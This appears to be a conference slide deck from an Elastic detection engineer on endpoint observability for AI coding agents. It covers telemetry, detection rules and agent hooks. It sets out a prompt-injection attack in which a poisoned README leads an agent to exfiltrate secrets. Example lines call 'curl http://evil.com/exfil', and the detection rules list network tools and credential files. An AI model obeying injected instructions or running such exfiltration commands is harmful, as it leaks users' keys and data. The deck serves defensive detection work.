[un]prompted - The AI Practitioner Conference

"Can You See What
Your AI Saw?"

GenAI Endpoint Observability for Detection Engineers

Mika Ayenson, Ph.D.  ·  Detection Engineering @ Elastic

Mika Ayenson

$ whoami_

About Me

Mika Ayenson, Ph.D.

TRaDE Team Lead @ Elastic

Leads Threat Research & Detection Engineering (TRaDE)

10+ years in security research & cyber experimentation

Automates everything, family-motivated efficiency nerd

ayenson.com github.com/Mikaayenson linkedin.com/in/mika-ayenson x.com/stryker0x

The Landscape Won't Stop Growing

New GenAI tools, agents, and frameworks ship daily. Detection engineering can't keep up by enumerating them.

Cursor · Claude Code · GitHub Copilot · ChatGPT · Windsurf · Devin · Gemini Code Assist · Amazon Q · Tabnine · Codeium · Replit Agent · Sourcegraph Cody · JetBrains AI · Aider · Continue · Sweep · OpenHands · Codium · LangChain · LangGraph · CrewAI · AutoGen · OpenAI Agents SDK · Semantic Kernel · DSPy · Instructor · Pydantic AI · Agno · SmolAgents · Mastra · Anthropic Computer Use · Browser Use · Playwright MCP · Stagehand · Browserbase · Steel · AgentQL · Lovable · Bolt.new · v0 · Tempo · Softgen · Firebase Studio · Figma Make · vLLM · Ollama · SGLang · TensorRT-LLM · llama.cpp · LM Studio · Jan · Msty · GPT4All · MemO · Letta · Zep · LangMem · Cognee · Graphiti · Hypergol · Keywords AI · OpenRouter · Portkey · Helicone · LiteLLM · E2B · Daytona · Modal · Runloop · Morph · Cognition · Poolside · Magic · Factory AI · and counting...

190+ tools across 14 categories — and this was last week's count.

Source: Morph AI Coding Agent Dev Tools map · LLMDevs community

REAL WORLD · r/vscode · 2026

"I have no idea which extension it could be"

A VS Code user discovers one of their extensions is silently connecting to livefootballtickets.com. Extensions from Microsoft, Anthropic, GitHub — all trusted publishers. No new installs. No idea which one.

Reddit post about suspicious VS Code extension
VS Code firewall prompt for livefootballtickets.com

The detection gap

Users install tools faster than they can audit them. Extensions run with ambient authority. When something goes wrong — they can't even identify the source.

Your Devs Are Running These.
Right Now. On Your Endpoints.

85%
of devs regularly use AI coding tools
22%
of merged code is AI-authored
55%
are "heavy users" (76%+ of coding time)

These tools spawn shells, write files, and make network calls. And your EDR has no idea an AI is driving.

JetBrains Dev Ecosystem 2025 · DX AI-Assisted Engineering Q4 2025 · ACTI Agentic Coding Survey Jan 2026

TELEMETRY INSIGHTS · DNS   |   START HERE | CHEAPEST TELEMETRY

Top LLM Endpoints by Host Count

Source: dns.question.name  ·  Metric: unique host.id  ·  DNS/network is the fastest path to visibility

Unique hosts per endpoint:

api.anthropic.com · 27.77%
chatgpt.com · 23.86%
claude.ai · 20.61%
api.openai.com · 10.63%
gemini.googleapis.com · 3.47%
api-inference.huggingface.co · 2.17%
copilot.microsoft.com · 1.74%
perplexity.ai · 1.52%
openai.azure.com · 1.30%
others (groq, deepseek, ...) · 6.93%
TELEMETRY INSIGHTS · CODE SIGNATURE

Signed vs Unsigned Binaries → LLM Endpoints

Source: process.code_signature.exists + process.code_signature.status  ·  Metric: unique host.id

98.5% signed + trusted
CODE SIGNATURE · 131 UNIQUE HOSTS
Signed + Trusted · 129 hosts · 98.47%
Unsigned (no signature) · 2 hosts · 1.53%

Only 2 out of 131 hosts ran unsigned binaries

Nearly every process connecting to LLM APIs is signed and trusted. An unsigned binary reaching an LLM endpoint is an immediate anomaly worth investigating.

Detection rule: Alert on any process where process.code_signature.exists == false connecting to known LLM domains.
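As a minimal sketch of that rule's logic in Python, useful for hunting over exported events. Field names mirror ECS (process.code_signature.exists, dns.question.name), but the event shapes here are simplified assumptions, not Elastic's actual event format:

```python
# Known LLM API domains (subset taken from the DNS telemetry above).
LLM_DOMAINS = {
    "api.anthropic.com", "api.openai.com", "claude.ai",
    "gemini.googleapis.com", "copilot.microsoft.com",
}

def is_unsigned_llm_connection(event: dict) -> bool:
    """Flag a process with no code signature reaching a known LLM endpoint."""
    sig = event.get("process", {}).get("code_signature", {})
    dest = event.get("dns", {}).get("question", {}).get("name", "")
    return sig.get("exists") is False and dest in LLM_DOMAINS

# Two illustrative events: one signed + trusted, one unsigned.
events = [
    {"process": {"code_signature": {"exists": True, "status": "trusted"}},
     "dns": {"question": {"name": "api.anthropic.com"}}},
    {"process": {"code_signature": {"exists": False}},
     "dns": {"question": {"name": "api.openai.com"}}},
]
alerts = [e for e in events if is_unsigned_llm_connection(e)]
```

Given the 98.5% signed baseline above, a filter this blunt still yields a workable alert volume.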
TELEMETRY INSIGHTS · PROCESS ANCESTRY

Top Processes Spawned by GenAI Tools

Mostly signed, mostly legitimate. The unsigned ones are buried in the noise — and that's the problem.

git
3,400+
gh
720+
node
490+
rg
400+
bash
240+
jq
194
python
170+
kubectl
90

AVG COMMAND LINE LENGTH

48K

chars · zsh via claude · macOS

Top by OS:
macOS zsh→claude: 48K
Linux bash→cursor: 3K
Windows pwsh→codex: 2.3K

⚠ Caveat

Long command lines are an indicator, but LLMs routinely generate legitimate multi-pipe chains, which defeats naive length- and entropy-based detection.
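One way to operationalize that caveat is per-tool length baselines instead of a global threshold. A sketch with illustrative numbers only; the 48K/3K/2.3K figures above are observed averages, and the thresholds here are hypothetical multiples of them, not tuned values:

```python
# Per (platform, parent tool) command-line length thresholds. Illustrative:
# set each well above the observed average for that tool, not globally.
THRESHOLDS = {
    ("macos", "claude"): 100_000,   # observed avg ~48K via zsh
    ("linux", "cursor"): 10_000,    # observed avg ~3K via bash
    ("windows", "codex"): 8_000,    # observed avg ~2.3K via pwsh
}
DEFAULT_THRESHOLD = 10_000

def cmdline_anomalous(platform: str, tool: str, cmdline: str) -> bool:
    """Flag command lines far beyond the per-tool baseline length."""
    limit = THRESHOLDS.get((platform, tool), DEFAULT_THRESHOLD)
    return len(cmdline) > limit
```

A 48K-char command line from zsh via claude on macOS stays under its baseline, while the same length from bash via cursor on Linux fires.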

TELEMETRY INSIGHTS · FILE MODIFICATION

GenAI File Write Activity

What GenAI tools and their descendants write to disk, by unique host.id

omni → .md · 9 hosts
go → .md · 3 hosts
codex → .py · 3 hosts
claude → .txt · 2 hosts
claude → .tmp · 2 hosts
Claude → .json · 2 hosts
go → .yaml · 2 hosts
git → .json · 2 hosts
Python → .jsonl · 2 hosts

Autonomous file writes

GenAI tools write code, configs, temp files, and data to disk without explicit user action. The subset targeting .json, .yaml, .md configs is a persistence surface.

Notable patterns

omni (Cursor) writes .md across 9 hosts
codex writes .py files directly
claude creates .tmp staging files
copilot-language-server writes to .db
Detection angle: Monitor file writes to AI config paths by unexpected processes.
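A sketch of that detection angle. The config paths and their expected writers below are hypothetical examples for illustration, not a vetted allowlist:

```python
import fnmatch

# Hypothetical AI tool config paths worth watching, mapped to the processes
# expected to write them; any other writer is worth an alert.
AI_CONFIG_GLOBS = {
    "*/.claude/*": {"claude"},
    "*/.cursor/*": {"cursor", "Cursor Helper"},
    "*/.codex/*": {"codex"},
}

def unexpected_config_write(process_name: str, file_path: str) -> bool:
    """True when a watched AI config path is written by an unexpected process."""
    for glob, expected_writers in AI_CONFIG_GLOBS.items():
        if fnmatch.fnmatch(file_path, glob):
            return process_name not in expected_writers
    return False  # path not under any watched AI config directory
```

For example, bash writing into ~/.claude/ fires; claude writing its own settings does not.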
TELEMETRY INSIGHTS · DETECTION SIGNALS

Real Signals from Production Telemetry

Credential Access via GenAI

credentials.db via Python · 15 hosts
credentials via claude · 4 hosts
Cookies via claude · 2 hosts
logins.json via claude.exe · 1 host
azureProfile.json via jq · 4 hosts

Suspicious URLs via GenAI Shell

webhook.site · zsh via claude
api.telegram.org · bash via node
polymarket.com · 30 events via claude
hackerone.com · zsh via claude
Raw IPs: 35.178.x, 52.56.x, 162.243.x

Persistence via GenAI Tool

PlistBuddy → Terminal.plist · 6 hosts
defaults → Terminal.plist · 6 hosts
watchman → watchman.plist · 1 host
powershell → AutoMuteGames.lnk · 1 host

Unusual DNS from GenAI Processes

Cursor Helper → hcaptcha.com
Cursor Helper → supabase.co
Cursor Helper → intercom
Claude → microsoft365.mcp.claude.com
codex → grafana-mcp.osend.io
01

The Problem

Your alert fired. A suspicious process ran. Good luck figuring out if a human or an LLM did it.

...the problem, again

From the presentation right before this one.

Claude Code running forensics on a SIFT workstation

"Find evil in base-rd01-cdrive.E01 and write a comprehensive report..."

THE CORE QUESTION

Intent Attribution Is Broken

Developer or AI agent? Both drive /bin/zsh → curl http://evil.com/exfil · pid: 48291 · user: developer. Who ran it? Identical telemetry.

Same PID, same user, same command line. Nearly identical telemetry. Looking at raw events, it's extremely difficult to tell them apart.

Threat Model

Prompt Injection · hidden instructions in context · OWASP MCP06
Malicious MCP Server · poisoned tool schemas · OWASP MCP03
AI-Assisted Attack · adversary uses coding tools · "living off the AI"
Trojanized AI Tools · fake MCP servers, malicious skills · commodity infostealer

The AI agent executes tools on the developer endpoint. At stake on your dev's laptop: API keys · SSH keys · source code · cloud credentials · browser data.

OWASP MCP Top 10 (2025) · VirusTotal: From Automation to Infection (Feb 2026)

Attack in Action

A poisoned repo file tricks the AI agent into exfiltrating data — all through legitimate-looking process chains.

1 · INJECTION: a poisoned README.md carries hidden instructions
2 · INGESTION: the AI agent reads the context window and follows the injected prompt
3 · EXECUTION: the Shell tool runs bash -c "curl ..." and spawns a real process
4 · IMPACT: exfiltration via curl http://evil.com/data (secrets, source, keys)

What EDR sees: Cursor Helper → zsh → curl http://evil.com/data. No link to the poisoned file. No prompt context. No AI attribution.

The entire chain looks like a developer running curl. Without prompt-level telemetry, the poisoned context is invisible.

02

Current Telemetry

What does endpoint telemetry actually give us when AI tools run commands?

What EDR Sees Today

Visible

Process spawns with ancestry chains

File events: creates, writes, deletes

Network / DNS: cheapest, most actionable

User context: uid, session, root = suspicious

Runtime scrutiny: node, npm, deno spawns

vs

New Observability Opportunities

The prompt that triggered it

Model reasoning for the command

Shell builtins: no child process

MCP tool identity: which server?

Human vs. AI intent boundary

Where Detection Breaks Down

Human or AI?

No field distinguishes "Cursor Agent spawned this" from "user typed it." process.parent.name is all there is. How would you enrich that?

Sandbox bypass

AI agents can self-escalate from sandboxed to unsandboxed execution. How would you even detect that privilege transition?

Cross-session context loss

AI tools operate in discrete sessions. A new session starts with a clean slate, so if an attacker starts fresh, your forensic chain breaks. How do you correlate across sessions?

Which MCP server ran that?

MCP servers spawn processes through node or python3. The server identity isn't in process metadata. How do you attribute the tool?

Process Ancestry Chain

Cursor.app (Electron IDE) → Cursor Helper (Plugin) (extension host) → /bin/zsh (AI-spawned shell) → curl http://evil.com/exfil

EDR sees: process.name: curl · parent: /bin/zsh · grandparent: Cursor Helper · user: developer
EDR cannot see: which prompt triggered it · whether the user approved · agent mode vs. manual
03

Detection Opportunities

Process telemetry gives you more than you'd think. Here's where the signal is.

Why parent.name Isn't Enough

Direct child only

// Catches 1 level, misses grandchildren
process where event.type == "start" and
  process.parent.name in (
    "claude", "cursor", "Cursor Helper (Plugin)"
  ) and
  process.name in ("curl", "wget", "nc")

Full ancestry walk

// Walks entire tree, any depth
process where event.type == "start" and
  descendant of [
    process where process.parent.name in (
      "claude", "cursor", "Cursor Helper (Plugin)"
    )
  ] and
  process.name in ("curl", "wget", "nc")

Source: production Elastic Defend rules

PRODUCTION ES|QL | THE KEY TECHNIQUE

Entity ID Intersection

// detection-rules: Suspicious Network or Recon Activity via GenAI Descendant
FROM logs-endpoint.events.process-*
| WHERE event.type == "start" AND process.Ext.ancestry IS NOT NULL
| EVAL is_genai_spawn = process.parent.name IN
    ("claude", "cursor", "Cursor Helper", "copilot", "windsurf" /* ... */),
  genai_entity_id = CASE(is_genai_spawn, process.parent.entity_id, NULL)
| INLINE STATS all_genai_entity_ids = VALUES(genai_entity_id)
    WHERE genai_entity_id IS NOT NULL
| EVAL genai_ancestor_ids =
    MV_INTERSECTION(all_genai_entity_ids, process.Ext.ancestry)  // ← entity_id ∩ entity_id
| WHERE genai_ancestor_ids IS NOT NULL
  AND NOT is_genai_spawn  // exclude direct children (grandchildren+ only)
  AND process.name IN ("curl", "wget", "nc", "nmap", "whoami", "ssh" /* ... */)
GenAI entity_ids: [ent_A, ent_B, ent_C] (collected via INLINE STATS)
process.Ext.ancestry: [ent_X, ent_A, ent_Y, ent_Z] (full ancestry of the suspicious process)
Intersection = [ent_A] → proof of GenAI ancestry
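The MV_INTERSECTION trick reduces to a plain set intersection. A minimal Python model of the same logic, using the illustrative entity IDs from this slide rather than real telemetry:

```python
# Entity IDs of processes spawned directly by GenAI tools (the query collects
# these via INLINE STATS); hard-coded here for illustration.
genai_entity_ids = {"ent_A", "ent_B", "ent_C"}

def genai_ancestors(ancestry: list[str]) -> set[str]:
    """Intersect a process's full ancestry with known GenAI entity IDs."""
    return genai_entity_ids & set(ancestry)

# A suspicious process whose ancestry contains ent_A is a GenAI descendant,
# even though its direct parent (ent_X) is not a GenAI tool.
suspicious = {"name": "curl", "ancestry": ["ent_X", "ent_A", "ent_Y", "ent_Z"]}
hits = genai_ancestors(suspicious["ancestry"])
```

A non-empty intersection is the proof of GenAI ancestry at any depth; the direct-child case is then excluded separately, as the query does with NOT is_genai_spawn.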
ELASTIC DEFEND | THE MCP PROBLEM

MCP Server Detection

// Catches MCP servers spawning shells or utilities
process where event.type == "start" and
  process.parent.name in ("node", "python3", "deno") and
  process.parent.command_line like~ ("*mcp*", "*mcp-server*", "*mcp_server*") and
  (
    (process.name in ("bash", "zsh", "sh") and process.args == "-c") or
    process.name in ("curl", "git", "powershell.exe")
  )

What's Detectable

  • MCP server spawns a shell with -c
  • Pattern match on *mcp* in parent cmdline

What's still missing

  • Which MCP tool was invoked
  • MCP server identity or trust level
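The same matching logic as the EQL rule, sketched in Python for hunting over exported events. The patterns and process lists come from the rule; the function signature and event handling are simplified assumptions:

```python
import fnmatch

MCP_PATTERNS = ("*mcp*", "*mcp-server*", "*mcp_server*")
RUNTIMES = {"node", "python3", "deno"}
SHELLS = {"bash", "zsh", "sh"}

def mcp_spawned_shell(parent_name: str, parent_cmdline: str,
                      child_name: str, child_args: list[str]) -> bool:
    """True when a runtime whose cmdline mentions mcp spawns a shell with -c."""
    looks_like_mcp = parent_name in RUNTIMES and any(
        fnmatch.fnmatch(parent_cmdline.lower(), p) for p in MCP_PATTERNS
    )
    return looks_like_mcp and child_name in SHELLS and "-c" in child_args
```

Note this inherits the rule's core weakness: it identifies "some MCP server" by cmdline pattern, not which server or which tool was invoked.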
EQL · CREDENTIAL ACCESS + COLLECTION

GenAI Process Accessing Sensitive Files

file where event.action in ("open", "creation", "modification") and
  event.outcome == "success" and
  // GenAI process by name
  process.name in (
    "claude", "cursor", "copilot", "codex", "ollama",
    "gpt4all", "gemini-cli", "llama-server" /* ... */
  ) and
  // Sensitive credential & config files
  file.name like~ (
    "logins.json", "Login Data", "cookies.sqlite", "credentials",
    "accessTokens.json", "login.keychain-db", "known_hosts",
    ".bashrc", ".zshrc" /* ... */
  )
GenAI process (cursor · claude · copilot · ollama · codex · gemini-cli) → file event → sensitive file access (credentials · accessTokens.json · login.keychain-db · .bashrc) → ALERT · high severity (73) · T1555 · T1005

What's Shippable Today

Tactic | Rule | Type
Execution | GenAI/MCP Child Process Execution | BBR · EQL
Execution | Suspicious Activity via GenAI Descendant | ES|QL + EQL
C2 | GenAI Connection to Unusual Domain | new_terms
Credential Access | Sensitive File Access + auto kill_process | EQL sequence
Persistence | LaunchAgents / rc.local / Startup modification | EQL sequence
Defense Evasion | Unusual Process Modifying GenAI Config | new_terms

Cross-platform: macOS, Linux, Windows  ·  Elastic Defend rules include automated prevention responses

Detection Rules vs. Hunting

Detection Rules

Real-time

EQL descendant of · maxspan=1m

Auto-response: kill_process

Threat Hunting

Batch / Historical

ES|QL INLINE STATS + MV_INTERSECTION

Hours of history · surface anomalies

Use both. Elastic Defend kills in real-time. SIEM detection rules find what slipped past.

Simplest starting point: Flag known LLM process names (cursor, claude, copilot) via process metadata and mark every subprocess as AI-descended.
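That starting point can be sketched as a parent-chain walk. The toy process table below stands in for real telemetry, where the linkage would come from process.entity_id and parent fields rather than PIDs:

```python
AI_TOOLS = {"cursor", "claude", "copilot", "windsurf", "codex"}

# Toy process table: pid -> (name, parent_pid). In real telemetry this
# linkage comes from process.entity_id plus parent references.
PROCS = {
    1: ("launchd", 0),
    10: ("claude", 1),
    20: ("zsh", 10),    # shell spawned by claude
    30: ("curl", 20),   # grandchild of claude
    40: ("zsh", 1),     # ordinary user shell
}

def ai_descended(pid: int) -> bool:
    """Walk the parent chain; any AI-tool ancestor marks the process."""
    seen = set()
    while pid and pid not in seen:
        seen.add(pid)  # guard against cycles in a stale snapshot
        name, ppid = PROCS.get(pid, ("", 0))
        if name in AI_TOOLS:
            return True
        pid = ppid
    return False
```

Here curl (pid 30) is flagged because claude sits two levels up its chain, while the ordinary zsh (pid 40) is not.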

04

Where the Industry Needs to Go

Today's best option is process.parent.name and command_line heuristics. That's not good enough.

The Gaps

Every production rule today is a workaround for telemetry that should exist but doesn't.

ENDPOINT OPPORTUNITIES
✗ AI tool identity: guessed from parent
✗ Agent mode vs. manual: invisible
✗ The prompt that triggered the action
✗ MCP server name: command_line only
✗ User approval state

PROVIDER OPPORTUNITIES
✗ Guardrail evaluation results
✗ Tool-use decisions / reasoning
✗ Content policy violation flags
✗ Model refusal events
✗ Token-level tool call attribution

OWASP MCP08: Lack of Audit and Telemetry (Top 10 Risk)

Risks Still on the Table

PII & API Key Exposure

  • Capturing prompts means logging what devs type: PII, secrets, API keys
  • Prompt telemetry creates a new exfil surface
  • gen_ai.content.prompt needs redaction before SIEM

Cross-Session Blind Spots

  • New session = clean slate. Forensic trail is gone
  • No session correlation ID in endpoint telemetry
  • Can't reconstruct the AI's full decision chain

More telemetry is good. But it introduces new compliance and forensic challenges that need to be solved simultaneously.

EMERGING CAPABILITY

Agent Hooks = Telemetry Source

All major AI coding tools now expose lifecycle hooks: shell commands that fire at key agent events. These are a direct telemetry pipeline for what EDR can't see.

Claude Code

PreToolUse · PostToolUse
SessionStart / End
UserPromptSubmit
PermissionRequest
SubagentStart / Stop

Cursor

beforeShellExecution
afterFileEdit
beforeMCPExecution
sessionStart / End
afterAgentResponse

GitHub Copilot

preToolUse · postToolUse
sessionStart / End
userPromptSubmitted
errorOccurred
 
AI tool event (PreToolUse fires) → hook script (captures prompt + tool + context) → OTel / syslog (gen_ai.* spans + events) → SIEM + EDR (AI attribution on every alert)
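A sketch of the hook-script stage. Claude Code delivers hook payloads as JSON on stdin; the field names used here (session_id, tool_name, tool_input) follow its documented hook input but should be verified against your tool's schema, and the output field mapping is an illustrative choice, not a standard:

```python
import json
import time

def hook_record(payload: dict) -> str:
    """Map a PreToolUse hook payload onto gen_ai.*-style fields for the SIEM."""
    return json.dumps({
        "@timestamp": time.time(),
        "gen_ai.session.id": payload.get("session_id"),
        "gen_ai.tool.name": payload.get("tool_name"),
        "gen_ai.tool.input": payload.get("tool_input"),
        "event.kind": "ai_hook",
    })

# In a real hook, the payload arrives as JSON on stdin:
#     print(hook_record(json.load(sys.stdin)))
# and a log shipper (e.g. Filebeat) forwards the printed line to the SIEM.
example = hook_record({"session_id": "sess_abc123", "tool_name": "Bash",
                       "tool_input": {"command": "git status"}})
```

One JSON line per tool invocation is enough to join against endpoint process events later.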
APPLICATION MONITORING · OTEL

OTel Application Monitoring Bridges the Gap

EDR sees processes. APM sees intent. gen_ai.* semantic conventions connect them.

gen_ai.* Semantic Conventions

gen_ai.client.token.usage: token consumption
gen_ai.client.operation.duration: latency
gen_ai.server.time_to_first_token
gen_ai.client.inference.operation.details
gen_ai.evaluation.result: guardrails

MCP Trace Context

params._meta propagates trace IDs across tools
Correlate: prompt → tool decision → process spawn
Link AI agent session to endpoint alert

Upstream Work Happening Now

OTel Python SDK → gen_ai conventions v1.37+
Elastic ECS RFC 0052: gen_ai.* field mapping
Endpoint native GenAI observability requested
Hook → OTel → SIEM pipeline prototyping

The Vision

Hook captures PreToolUse → OTel gen_ai.client.inference → enriches endpoint alert with AI attribution → detection rule correlates both

OpenTelemetry GenAI Conventions

Claude Code already ships OTel natively: 8 metrics + 5 event types via claude_code.* namespace. The gen_ai.* spec provides a standard. Most teams aren't ingesting either yet.

OTel gen_ai.* Spec

gen_ai.agent.id

gen_ai.operation.name

gen_ai.provider.name

MCP via params._meta

Industry standard, not yet widely adopted

Claude Code claude_code.*

claude_code.token.usage

claude_code.cost.usage

claude_code.session.count

+ tool_result, api_request events

Own namespace, ships today

Still missing for security

Spawn correlation ID

Guardrail decision context

Cursor, Copilot: no OTel

Gap is narrowing

Where the Industry Should Head

// One JSON blob transforms a generic alert into an AI-attributable event
{
  "process.parent.ai_tool.name": "cursor",
  "process.parent.ai_tool.mode": "agent",   // agent | ask | edit | manual
  "gen_ai.session.id": "sess_abc123",
  "gen_ai.tool.name": "Shell",
  "gen_ai.tool.mcp_server": "filesystem-server",
  "gen_ai.tool.user_approved": true,
  "gen_ai.guardrail.decision": "allowed",
  "gen_ai.model.provider": "anthropic",
  "gen_ai.process.correlation_id": "proc_corr_001"
}
Today, a generic process alert: "curl ran. User: developer. That's all."
Future, an AI-attributable event: "cursor agent ran curl via MCP. User approved. Session: sess_abc123." Plus anomaly detection on CPU, token usage, and session length.

Provider Logs = Security Telemetry

User prompt (input) → guardrail (block / allow) → model inference → tool-use decision → endpoint exec (process spawn) → EDR → SIEM / SOC

Agent hooks · OTel gen_ai.* · application monitoring: PreToolUse · SessionStart · token.usage · operation.duration · tool invocation events

Previously invisible to security teams; now capturable via hooks + OTel and forwarded to the SIEM alongside EDR alerts.

Guardrail blocks, tool-use decisions, refusal events: these are security signals. Most are trapped in vendor dashboards.

Claude Code is the exception. It exports OTel metrics and events natively: session duration, token usage, tool results, API errors. Proof providers can do it.

05

Takeaways

Reduce the Attack Surface

Before writing rules, reduce what you need to detect.

Asset Inventory First

Know which GenAI tools are on your fleet
Track: Cursor, Claude Code, Copilot, Windsurf, Codex
ps aux | grep -E "cursor|claude|copilot"
If you don't know it's running, you can't secure it

Browser vs. Native Client

Browser-based AI (Gemini web, ChatGPT web) = sandboxed
Native clients (Claude Code, Cursor) = full endpoint access
Pushing users to browser reduces shell/file risk
Attacker must bypass browser sandbox first

Scrutinize Runtimes

Monitor node, npm, deno execution as GenAI descendants
GenAI running as root = immediate flag
Apply network controls: block unexpected LLM domains

DNS/Network First

Cheapest, most actionable telemetry source
Faster than parsing 48K-char command lines
Block or alert on suspicious domains per policy
NGFWs already classify GenAI traffic (FortiGate, Palo Alto App-ID) — detect & block without an agent
Then layer process ancestry and file monitoring

Recap: The Path Forward

A maturity progression. Start where you are, build toward full observability.

1. Visibility

▸ Inventory GenAI tools on your fleet
▸ DNS queries to LLM endpoints
▸ Process ancestry from AI parents
▸ Who is using what, and how much?

TODAY: use existing telemetry

2. Guardrails

▸ Detection rules for intent, not just tools
▸ Network controls on LLM domains
▸ NGFW app control: GenAI category for policy enforcement
▸ Browser/sandbox policies where possible
▸ Scrutinize root, node, unsigned binaries

NEXT: active detection & policy

3. Full Observability

▸ OTel gen_ai.* semantic conventions
▸ Agent hooks (PreToolUse, SessionStart)
▸ Anomaly detection on metrics (CPU, tokens)
▸ Prompt → tool → process correlation

LONG TERM: OTel, hooks, APM

Thanks

Mika Ayenson, Ph.D.

TRaDE Team Lead  ·  Elastic

linkedin.com/in/mika-ayenson

[un]prompted - The AI Practitioner Conference